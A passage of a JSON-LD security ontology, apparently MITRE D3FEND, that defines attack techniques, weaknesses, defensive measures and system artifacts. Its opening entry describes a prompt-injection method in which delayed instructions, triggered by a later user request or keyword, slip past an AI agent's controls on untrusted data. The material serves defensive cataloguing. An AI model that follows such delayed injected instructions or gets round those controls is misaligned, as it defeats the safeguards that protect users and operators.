      "d3f:definition": "Adversaries may include instructions to be followed by the AI system in response to a future event, such as a specific keyword or the next interaction, in order to evade detection or bypass controls placed on the AI system.\n\nFor example, an adversary may include \"If the user submits a new request...\" followed by the malicious instructions as part of their prompt.\n\nAI agents can include security measures against prompt injections that prevent the invocation of particular tools or access to certain data sources during a conversation turn that has untrusted data in context. Delaying the execution of instructions to a future interaction or keyword is one way adversaries may bypass this type of control.",
      "rdfs:label": "Delay Execution of LLM Instructions - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0094"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASDefenseEvasionTechnique"
      },
      "skos:prefLabel": "Delay Execution of LLM Instructions"
    },
    {
      "@id": "d3f:Reference-Windows-Management-Instrumentation",
      "@type": [
        "owl:NamedIndividual",
        "d3f:SpecificationReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://docs.microsoft.com/en-us/windows/win32/wmisdk/wmi-start-page"
      },
      "d3f:kb-organization": "Microsoft",
      "d3f:kb-reference-of": [
        {
          "@id": "d3f:ConfigurationInventory"
        },
        {
          "@id": "d3f:HardwareComponentInventory"
        },
        {
          "@id": "d3f:NetworkNodeInventory"
        },
        {
          "@id": "d3f:SoftwareInventory"
        }
      ],
      "d3f:kb-reference-title": "Windows Management Instrumentation",
      "rdfs:label": "Reference - Windows Management Instrumentation (WMI)"
    },
    {
      "@id": "d3f:AML.T0084.000",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0084.000",
      "d3f:definition": "Adversaries may attempt to discover the data sources a particular agent can access.  The AI agent's configuration may reveal data sources or knowledge.\n\nThe embedded knowledge may include sensitive or proprietary material such as intellectual property, customer data, internal policies, or even credentials. By mapping what knowledge an agent has access to, an adversary can better understand the AI agent's role and potentially expose confidential information or pinpoint high-value targets for further exploitation.",
      "rdfs:label": "Embedded Knowledge - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0084.000"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0084"
      },
      "skos:prefLabel": "Embedded Knowledge"
    },
    {
      "@id": "d3f:RadioModem",
      "@type": "owl:Class",
      "d3f:definition": "A radio modem provides the means to send digital data wirelessly.  Radio modems are used to communicate by direct broadcast satellite, WiFi, WiMax, mobile phones, GPS, Bluetooth and NFC. Modern telecommunications and data networks also make extensive use of radio modems where long distance data links are required. Such systems are an important part of the PSTN, and are also in common use for high-speed computer network links to outlying areas where fiber optic is not economical.",
      "rdfs:isDefinedBy": {
        "@id": "http://dbpedia.org/resource/Modem#Radio"
      },
      "rdfs:label": "Radio Modem",
      "rdfs:subClassOf": {
        "@id": "d3f:Modem"
      }
    },
    {
      "@id": "d3f:CWE-433",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-433",
      "d3f:definition": "The product stores raw content or supporting code under the web document root with an extension that is not specifically handled by the server.",
      "rdfs:label": "Unparsed Raw Web Content Delivery",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-219"
      }
    },
    {
      "@id": "d3f:Reference-MethodAndSystemForDetectingThreatsUsingMetadataVectors_VECTRANETWORKSInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20160191551A1"
      },
      "d3f:kb-abstract": "An approach for detecting network attacks using metadata vectors may initially involve receiving network communications or packets, extracting metadata items from the packets. The metadata items describe the communications without requiring deep content inspection of the data payload or contents. The communications may be clustered into groups using the metadata items. If a cluster exceeds a threshold, an alarm may be generated.",
      "d3f:kb-author": "Nicolas BEAUCHESNE; David Lopes Pegna; Karl Lynn",
      "d3f:kb-mitre-analysis": "This patent describes detecting network threats by first passively collecting network traffic and storing it for processing. Metadata from network traffic such as packet header information or information about a session (ex. time between request/responses) is extracted. After the metadata is extracted, the data is grouped into cluster maps of matching events to track how many instances of a network communication have occurred, such as five requests sent and five responses received. Threshold limits are set on the clusters to monitor them and if a cluster grows too large (ex. ten instances of requests and responses) this can correspond to unauthorized behavior. This method might detect, for example, a network attack using malicious payloads with automated scripts, in which a bot sends replicated malicious payloads to the same destination port.",
      "d3f:kb-organization": "VECTRA NETWORKS Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProtocolMetadataAnomalyDetection"
      },
      "d3f:kb-reference-title": "Method and system for detecting threats using metadata vectors",
      "rdfs:label": "Reference - Method and system for detecting threats using metadata vectors - VECTRA NETWORKS Inc"
    },
    {
      "@id": "d3f:T0860",
      "@type": "owl:Class",
      "d3f:attack-id": "T0860",
      "d3f:definition": "Adversaries may perform wireless compromise as a method of gaining communications and unauthorized access to a wireless network. Access to a wireless network may be gained through the compromise of a wireless device. (Citation: Alexander Bolshev, Gleb Cherbov July 2014) (Citation: Alexander Bolshev March 2014) Adversaries may also utilize radios and other wireless communication devices on the same frequency as the wireless network. Wireless compromise can be done as an initial access vector from a remote distance.",
      "rdfs:label": "Wireless Compromise - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSInitialAccessTechnique"
      },
      "skos:prefLabel": "Wireless Compromise"
    },
    {
      "@id": "d3f:CWE-272",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-272",
      "d3f:definition": "The elevated privilege level required to perform operations such as chroot() should be dropped immediately after the operation is performed.",
      "rdfs:label": "Least Privilege Violation",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-271"
      }
    },
    {
      "@id": "d3f:WindowsOpenThread",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Opens an existing thread object.",
      "d3f:invokes": {
        "@id": "d3f:WindowsNtOpenThread"
      },
      "rdfs:isDefinedBy": {
        "@id": "https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-openthread"
      },
      "rdfs:label": "Windows OpenThread",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OSAPITraceThread"
        },
        {
          "@id": "_:N2ede80257aef4c5a90823516c954e750"
        }
      ]
    },
    {
      "@id": "_:N2ede80257aef4c5a90823516c954e750",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsNtOpenThread"
      }
    },
    {
      "@id": "d3f:CWE-440",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-440",
      "d3f:definition": "A feature, API, or function does not perform according to its specification.",
      "rdfs:label": "Expected Behavior Violation",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-684"
      }
    },
    {
      "@id": "d3f:T1007",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1007",
      "d3f:definition": "Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as <code>sc query</code>, <code>tasklist /svc</code>, <code>systemctl --type=service</code>, and <code>net start</code>.",
      "d3f:may-invoke": [
        {
          "@id": "d3f:CreateProcess"
        },
        {
          "@id": "d3f:GetRunningProcesses"
        }
      ],
      "rdfs:label": "System Service Discovery",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DiscoveryTechnique"
        },
        {
          "@id": "_:N465c68767d104a0b8ed613a500c4aea5"
        },
        {
          "@id": "_:N13521812d3f44c4aac6440f185df116b"
        }
      ]
    },
    {
      "@id": "_:N465c68767d104a0b8ed613a500c4aea5",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-invoke"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CreateProcess"
      }
    },
    {
      "@id": "_:N13521812d3f44c4aac6440f185df116b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-invoke"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:GetRunningProcesses"
      }
    },
    {
      "@id": "d3f:HardDiskFirmware",
      "@type": "owl:Class",
      "d3f:definition": "Firmware that is installed on a hard disk device.",
      "rdfs:label": "Hard Disk Firmware",
      "rdfs:seeAlso": {
        "@id": "dbr:Hard_disk_drive"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:PeripheralFirmware"
      },
      "skos:altLabel": "Hard Drive Firmware"
    },
    {
      "@id": "d3f:NetworkNode",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "In telecommunications networks, a node (Latin nodus, 'knot') is either a redistribution point or a communication endpoint. The definition of a node depends on the network and protocol layer referred to. A physical network node is an electronic device that is attached to a network, and is capable of creating, receiving, or transmitting information over a communications channel. A passive distribution point such as a distribution frame or patch panel is consequently not a node.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Node_(networking)"
      },
      "rdfs:label": "Network Node",
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalInformationBearer"
      }
    },
    {
      "@id": "d3f:LocalFilePermissions",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:LocalFilePermissions"
      ],
      "d3f:d3fend-id": "D3-LFP",
      "d3f:definition": "Local file permissions is the systematic process of defining, implementing, and managing access control policies that dictate user permissions for accessing files on a local system through the configuration of operating system functionality.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-FileAndFolderPermissions"
      },
      "d3f:restricts": [
        {
          "@id": "d3f:Directory"
        },
        {
          "@id": "d3f:File"
        }
      ],
      "rdfs:label": "Local File Permissions",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:AccessPolicyAdministration"
        },
        {
          "@id": "_:N3373c4967f454007ba3a83386ff9bd1f"
        },
        {
          "@id": "_:Nf51688758db1435da2aac9753332cd01"
        }
      ]
    },
    {
      "@id": "_:N3373c4967f454007ba3a83386ff9bd1f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:restricts"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Directory"
      }
    },
    {
      "@id": "_:Nf51688758db1435da2aac9753332cd01",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:restricts"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "d3f:produced-by",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x produced-by y: The entity x is created by entity y.",
      "owl:inverseOf": {
        "@id": "d3f:produces"
      },
      "rdfs:label": "produced-by",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:LinuxPtraceArgumentPTRACEGETREGS",
      "@type": "owl:Class",
      "d3f:definition": "Copy the tracee's general-purpose or floating-point registers, respectively, to the address data in the tracer.",
      "rdfs:isDefinedBy": {
        "@id": "https://man7.org/linux/man-pages/man2/ptrace.2.html"
      },
      "rdfs:label": "Linux Ptrace Argument PTRACE_GETREGS",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPISaveRegisters"
      }
    },
    {
      "@id": "d3f:kb-reference-title",
      "@type": "owl:DatatypeProperty",
      "d3f:definition": "x kb-reference-title y: The d3fend knowledge base reference x has the reference title string y.",
      "rdfs:label": "kb-reference-title",
      "rdfs:range": {
        "@id": "xsd:string"
      },
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-kb-data-property"
      }
    },
    {
      "@id": "d3f:CWE-1342",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1342",
      "d3f:definition": "The processor does not properly clear microarchitectural state after incorrect microcode assists or speculative execution, resulting in transient execution.",
      "rdfs:label": "Information Exposure through Microarchitectural State after Transient Execution",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-226"
      }
    },
    {
      "@id": "d3f:AML.T0046",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0046",
      "d3f:definition": "Adversaries may spam the AI system with chaff data that causes increase in the number of detections.\nThis can cause analysts at the victim organization to waste time reviewing and correcting incorrect inferences.",
      "rdfs:label": "Spamming AI System with Chaff Data - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0046"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASImpactTechnique"
      },
      "skos:prefLabel": "Spamming AI System with Chaff Data"
    },
    {
      "@id": "d3f:MemoryDeletionEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event marking the release or deallocation of memory resources, reclaiming them for reuse within the system.",
      "rdfs:label": "Memory Deletion Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:MemoryEvent"
        },
        {
          "@id": "_:Ne30c346556514fc5a09bef7153f5be4a"
        },
        {
          "@id": "_:Ne154260f52104b058e8bd178bd9a46d1"
        }
      ]
    },
    {
      "@id": "_:Ne30c346556514fc5a09bef7153f5be4a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:MemoryFreeFunction"
      }
    },
    {
      "@id": "_:Ne154260f52104b058e8bd178bd9a46d1",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:MemoryAllocationEvent"
      }
    },
    {
      "@id": "d3f:Semi-supervisedTransductiveLearning",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-SSTL",
      "d3f:definition": "The goal of transductive learning is to infer the correct labels for the given unlabeled data\nx_{l+1},... ,x_{l+u} only",
      "d3f:kb-article": "## References\nSemi-Supervised Learning. Wikipedia.  [Link](https://en.wikipedia.org/wiki/Semi-Supervised_Learning#Semi-supervised_learning).\n\nZhou, D., & Li, M. (2005). Semi-supervised learning by higher order regularization. In Proceedings of the 43rd Annual Meeting of the Association for Computational Linguistics (ACL) (pp. 1-9). [Link](https://www.cs.sfu.ca/~anoop/papers/pdf/semisup_naacl.pdf).",
      "rdfs:label": "Semi-supervised Transductive Learning",
      "rdfs:subClassOf": {
        "@id": "d3f:Semi-SupervisedLearning"
      }
    },
    {
      "@id": "d3f:kb-author",
      "@type": "owl:AnnotationProperty",
      "d3f:definition": "x kb-author y: The reference x has some author y.",
      "rdfs:domain": {
        "@id": "d3f:TechniqueReference"
      },
      "rdfs:label": "kb-author",
      "rdfs:range": {
        "@id": "xsd:string"
      },
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-kb-reference-annotation"
      }
    },
    {
      "@id": "d3f:TunnelRenewEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where the lifecycle of a network tunnel is extended, ensuring continued encapsulated communication and avoiding session expiration.",
      "rdfs:label": "Tunnel Renew Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:TunnelEvent"
        },
        {
          "@id": "_:N6c835c2cb5754d84b9ca711b19f50f13"
        }
      ]
    },
    {
      "@id": "_:N6c835c2cb5754d84b9ca711b19f50f13",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TunnelOpenEvent"
      }
    },
    {
      "@id": "d3f:IntranetDNSLookup",
      "@type": "owl:Class",
      "d3f:definition": "An Intranet Domain Name System (DNS) lookup is a DNS lookup made from a host on a network that is resolved after querying a DNS name server hosted on a that same network.",
      "rdfs:label": "Intranet DNS Lookup",
      "rdfs:seeAlso": {
        "@id": "dbr:Intranet"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DNSLookup"
      }
    },
    {
      "@id": "d3f:WatchdogTimer",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A watchdog timer (WDT, or simply a watchdog) is an electronic or software timer that is used to detect and recover from computer malfunctions.",
      "d3f:synonym": [
        "WDT",
        "Watchdog"
      ],
      "rdfs:isDefinedBy": {
        "@id": "https://dbpedia.org/resource/Watchdog_timer"
      },
      "rdfs:label": "Watchdog Timer",
      "rdfs:subClassOf": {
        "@id": "d3f:Timer"
      }
    },
    {
      "@id": "d3f:SoftwareLibraryFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:Subroutine"
      },
      "d3f:definition": "A software library is a collection of software components that are used to build a software product.",
      "d3f:may-contain": [
        {
          "@id": "d3f:ExecutableBinary"
        },
        {
          "@id": "d3f:ExecutableScript"
        }
      ],
      "rdfs:label": "Software Library File",
      "rdfs:seeAlso": {
        "@id": "https://dbpedia.org/page/Library_(computing)"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:File"
        },
        {
          "@id": "_:Ncf07a21b9c3e4b7e87f66fa98b429b5c"
        },
        {
          "@id": "_:N5b2e8fcd4a0e4607a3dbd60d3a2c570d"
        },
        {
          "@id": "_:Ncb036fc8740c40fc8e7cba461da340d3"
        }
      ]
    },
    {
      "@id": "_:Ncf07a21b9c3e4b7e87f66fa98b429b5c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Subroutine"
      }
    },
    {
      "@id": "_:N5b2e8fcd4a0e4607a3dbd60d3a2c570d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ExecutableBinary"
      }
    },
    {
      "@id": "_:Ncb036fc8740c40fc8e7cba461da340d3",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ExecutableScript"
      }
    },
    {
      "@id": "d3f:MathematicalFunction",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Computes mathematical expressions.",
      "rdfs:label": "Mathematical Function",
      "rdfs:subClassOf": {
        "@id": "d3f:Subroutine"
      }
    },
    {
      "@id": "d3f:T0824",
      "@type": "owl:Class",
      "d3f:attack-id": "T0824",
      "d3f:definition": "Adversaries may use input/output (I/O) module discovery to gather key information about a control system device. An I/O module is a device that allows the control system device to either receive or send signals to other devices. These signals can be analog or digital, and may support a number of different protocols. Devices are often able to use attachable I/O modules to increase the number of inputs and outputs that it can utilize. An adversary with access to a device can use native device functions to enumerate I/O modules that are connected to the device. Information regarding the I/O modules can aid the adversary in understanding related control processes.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been deprecated.",
      "rdfs:label": "I/O Module Discovery - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSDiscoveryTechnique"
      },
      "skos:prefLabel": "I/O Module Discovery"
    },
    {
      "@id": "d3f:CWE-1102",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1102",
      "d3f:definition": "The code uses a data representation that relies on low-level data representation or constructs that may vary across different processors, physical machines, OSes, or other physical components.",
      "rdfs:label": "Reliance on Machine-Dependent Data Representation",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-758"
      }
    },
    {
      "@id": "d3f:CWE-514",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-514",
      "d3f:definition": "A covert channel is a path that can be used to transfer information in a way not intended by the system's designers.",
      "rdfs:label": "Covert Channel",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1229"
      }
    },
    {
      "@id": "d3f:LM-0004",
      "@type": "owl:Class",
      "d3f:attack-id": "LM-0004",
      "d3f:definition": "Docking, berthing, or short-duration attach events create high-trust, high-bandwidth connections between vehicles. During these operations, automatic sequences verify latches, exchange status, synchronize time, and enable umbilicals that carry data and power; maintenance tools may also push firmware or tables across the interface. An attacker positioned on the visiting vehicle can exploit these handshakes and service channels to inject commands, transfer files, or access bus gateways on the host. Because many actions are expected “just after dock,” malicious traffic can ride the same procedures that commission the interface, allowing lateral movement from the visiting craft into the target spacecraft’s C&DH, payload, or support subsystems.",
      "rdfs:label": "Visiting Vehicle Interface(s) - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/LM-0004/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTALateralMovementTechnique"
      },
      "skos:prefLabel": "Visiting Vehicle Interface(s)"
    },
    {
      "@id": "d3f:DigitalIdentity",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "The unique representation of a subject engaged in an online transaction. A digital identity is always unique in the context of a digital service, but does not necessarily need to uniquely identify the subject in all contexts. In other words, accessing a digital service may not mean that the subject's real-life identity is known.  Note: There is no single, widely accepted definition for this term and context is important. This definition is specific to online transactions.",
      "d3f:identified-by": {
        "@id": "d3f:Identifier"
      },
      "rdfs:comment": "Variously describes or designates.  Designation is not compete or definite without context.  The representation generally can be identified by a unique identifier, though this may be private information.",
      "rdfs:label": "Digital Identity",
      "rdfs:seeAlso": {
        "@id": "https://pages.nist.gov/800-63-3/sp800-63-3.html"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalInformation"
        },
        {
          "@id": "_:Ndf0617515ff547eca2a565665c1215e2"
        }
      ]
    },
    {
      "@id": "_:Ndf0617515ff547eca2a565665c1215e2",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:identified-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Identifier"
      }
    },
    {
      "@id": "d3f:T1418.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1418.001",
      "d3f:definition": "Adversaries may attempt to get a listing of security applications and configurations that are installed on a device. This may include things such as mobile security products. Adversaries may use the information from [Security Software Discovery](https://attack.mitre.org/techniques/T1418/001) during automated discovery to shape follow-on behaviors, including whether or not to fully infect the target and/or attempt specific actions.",
      "rdfs:label": "Security Software Discovery - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:T1418"
      },
      "skos:prefLabel": "Security Software Discovery"
    },
    {
      "@id": "d3f:Second-stageBootLoader",
      "@type": "owl:Class",
      "d3f:definition": "An optional, often feature rich,  second stage set of routines run in order to load the operating system.",
      "rdfs:label": "Second-stage Boot Loader",
      "rdfs:subClassOf": {
        "@id": "d3f:BootLoader"
      }
    },
    {
      "@id": "d3f:may-query",
      "@type": "owl:ObjectProperty",
      "rdfs:label": "may-query",
      "rdfs:subPropertyOf": {
        "@id": "d3f:may-be-associated-with"
      }
    },
    {
      "@id": "d3f:Forecasting",
      "@type": "owl:Class",
      "rdfs:label": "Forecasting",
      "rdfs:subClassOf": {
        "@id": "d3f:AnalyticalPurpose"
      }
    },
    {
      "@id": "d3f:PhysicalDataDiode",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A device that physically enforces one-way (unidirectional) network communication.",
      "rdfs:isDefinedBy": {
        "@id": "https://isagca.org/hubfs/2023%20ISA%20Website%20Redesigns/ISAGCA/PDFs/Industrial%20Cybersecurity%20Knowledge%20FINAL.pdf?hsLang=en"
      },
      "rdfs:label": "Physical Data Diode",
      "rdfs:subClassOf": {
        "@id": "d3f:HardwareDevice"
      },
      "skos:example": {
        "@id": "https://owlcyberdefense.com/products/data-diode-products/"
      }
    },
    {
      "@id": "d3f:WindowsRegistryKeyReadEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a registry key is accessed to query its structure, properties, or associated metadata without modifying its state.",
      "rdfs:label": "Windows Registry Key Read Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:WindowsRegistryKeyEvent"
        },
        {
          "@id": "_:N7213cc8faf7b4918aad0506a5d62f4e0"
        }
      ]
    },
    {
      "@id": "_:N7213cc8faf7b4918aad0506a5d62f4e0",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsRegistryKeyCreationEvent"
      }
    },
    {
      "@id": "d3f:Actuator",
      "@type": "owl:Class",
      "d3f:definition": "An actuator is a mechanical or electromechanical device that, upon receiving a relatively low-energy control signal (e.g., electrical voltage, fluid pressure, or human force), translates its primary energy source (electric, hydraulic, or pneumatic) into targeted mechanical motion or adjustment. It typically works in conjunction with a control device (like a valve or logic driver) and is central to automation, enabling machines or systems to move, open, close, or otherwise manipulate their components or environment. By amplifying or redirecting energy from one form to another, the actuator executes control commands, thereby automating processes in industrial, automotive, aerospace, and other domains where precise mechanical action is essential.",
      "rdfs:label": "Actuator",
      "rdfs:seeAlso": {
        "@id": "dbr:Actuator"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:OutputDevice"
      }
    },
    {
      "@id": "d3f:DecoyPublicRelease",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:DecoyPublicRelease"
      ],
      "d3f:d3fend-id": "D3-DPR",
      "d3f:definition": "Issuing publicly released media to deceive adversaries.",
      "d3f:kb-article": "## How it works\nPublicly released media includes press release, videos, or other marketing collateral. The media may include URLs, points of contact, or other identifiers to entice interaction from adversaries.\n\n## Considerations\n* Information used in decoy public released media must contain enough realism to deceive and provide interaction from adversaries.\n* Continuous development, creation, and distribution of media and identifiers are needed to ensure adversary interaction continues over time.\n* Decoy public releases could be placed on platforms with different degrees of ownership, including entirely enterprise-owned infrastructure, IaaS, and SaaS (including social applications). Platforms that are not entirely enterprise-owned may be more likely to gather information",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-MockAttackCybersecurityTrainingSystemAndMethods_WOMBATSECURITYTECHNOLOGIESInc"
      },
      "rdfs:label": "Decoy Public Release",
      "rdfs:subClassOf": {
        "@id": "d3f:DecoyObject"
      }
    },
    {
      "@id": "d3f:T1646",
      "@type": "owl:Class",
      "d3f:attack-id": "T1646",
      "d3f:definition": "Adversaries may steal data by exfiltrating it over an existing command and control channel. Stolen data is encoded into the normal communications channel using the same protocol as command and control communications.",
      "rdfs:label": "Exfiltration Over C2 Channel - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileExfiltrationTechnique"
      },
      "skos:prefLabel": "Exfiltration Over C2 Channel"
    },
    {
      "@id": "d3f:CWE-55",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-55",
      "d3f:definition": "The product accepts path input in the form of single dot directory exploit ('/./') without appropriate validation, which can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files.",
      "rdfs:label": "Path Equivalence: '/./' (Single Dot Directory)",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-41"
      }
    },
    {
      "@id": "d3f:MultipleRegression",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-MR",
      "d3f:definition": "Multiple (linear) regression attempts to model the relationship between two or more explanatory variables and a response variable by fitting a linear equation to observed data.",
      "d3f:kb-article": "## References\nYale University Department of Statistics. (1997-98). Linear regression and multivariate analysis. [Link](http://www.stat.yale.edu/Courses/1997-98/101/linmult.htm)",
      "d3f:synonym": "Multiple Linear Regression",
      "rdfs:label": "Multiple Regression",
      "rdfs:subClassOf": {
        "@id": "d3f:RegressionAnalysis"
      }
    },
    {
      "@id": "d3f:SoftwareDeploymentTool",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Software that coordinates the deployment process of software to systems, typically remotely.",
      "rdfs:label": "Software Deployment Tool",
      "rdfs:subClassOf": {
        "@id": "d3f:ServiceApplication"
      }
    },
    {
      "@id": "d3f:T1592.004",
      "@type": "owl:Class",
      "d3f:attack-id": "T1592.004",
      "d3f:definition": "Adversaries may gather information about the victim's client configurations that can be used during targeting. Information about client configurations may include a variety of details and settings, including operating system/version, virtualization, architecture (ex: 32 or 64 bit), language, and/or time zone.",
      "rdfs:label": "Client Configurations",
      "rdfs:subClassOf": {
        "@id": "d3f:T1592"
      }
    },
    {
      "@id": "d3f:System",
      "@type": "owl:Class",
      "d3f:definition": "An artifact (instrumentality) that combines interrelated interacting artifacts designed to work as a coherent entity.  [Note that not all digital artifacts are systems nor are all systems digital artifacts.]",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/04384144-n"
      },
      "rdfs:label": "System",
      "rdfs:subClassOf": {
        "@id": "d3f:Artifact"
      }
    },
    {
      "@id": "d3f:T1071",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1071",
      "d3f:definition": "Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.",
      "d3f:may-transfer": {
        "@id": "d3f:CertificateFile"
      },
      "d3f:pref-label": "Application Layer Protocol C2",
      "d3f:produces": {
        "@id": "d3f:OutboundInternetNetworkTraffic"
      },
      "rdfs:label": "Application Layer Protocol",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CommandAndControlTechnique"
        },
        {
          "@id": "_:N6cc6bddc3b074d25a2e90ae60ff1a5aa"
        },
        {
          "@id": "_:Ned54efe517ab4fb1995d0a2da6494930"
        }
      ]
    },
    {
      "@id": "_:N6cc6bddc3b074d25a2e90ae60ff1a5aa",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-transfer"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CertificateFile"
      }
    },
    {
      "@id": "_:Ned54efe517ab4fb1995d0a2da6494930",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OutboundInternetNetworkTraffic"
      }
    },
    {
      "@id": "d3f:synonym",
      "@type": "owl:AnnotationProperty",
      "d3f:definition": "an equivalent term.",
      "rdfs:label": "synonym",
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-annotation"
      }
    },
    {
      "@id": "d3f:CCI-002005_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
